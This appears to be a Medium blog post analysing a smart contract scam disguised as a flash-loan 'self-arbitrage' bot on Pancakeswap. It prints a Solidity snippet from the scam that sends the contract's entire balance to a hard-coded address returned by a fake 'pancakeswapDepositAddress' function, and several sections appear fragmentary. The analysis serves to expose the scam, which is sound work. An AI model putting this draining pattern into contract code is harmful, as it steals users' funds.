Anatomy of a Smart Contract Scam

Front-running

Why is a smart contract surprising?

Don’t judge a contract by its cover

I had a look at the code, and at first glance, it appeared to be more like an arbitrage automation contract. The main body of the code contained a function called `action()` which looked like it executed a series of commands to:

  • create an ERC20 token,
  • take out a flash loan from Aave,
  • convert half of the loan to DAI tokens,
  • create two swap pools on Pancakeswap for the created token, half with the DAI, and half with the remaining ETH loan
  • perform swaps between the pools to profit from something mystical called “self-arbitrage” in a comment in the code,
  • move the profits to the callers wallet, and
  • replay the flash loan
pragma solidity ^0.5.0contract Manager {
function performTasks() public pure{

}

function pancakeswapDepositAddress() public pure returns (address) {
return 0x933B91682E821f50DE20D9cf457a5c883d8bEC43;
}
}
//pancakeswapfunction
address(uint160(manager.pancakeswapDepositAddress())).transfer(address(this).balance);

Conclusion

As scams go, this is an odd one. The mark needs to have enough knowledge to know how to compile a contract, deploy it, and then interact with it without the aid of a web3 website, but not enough knowledge to be able to dig into what is going on underneath.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store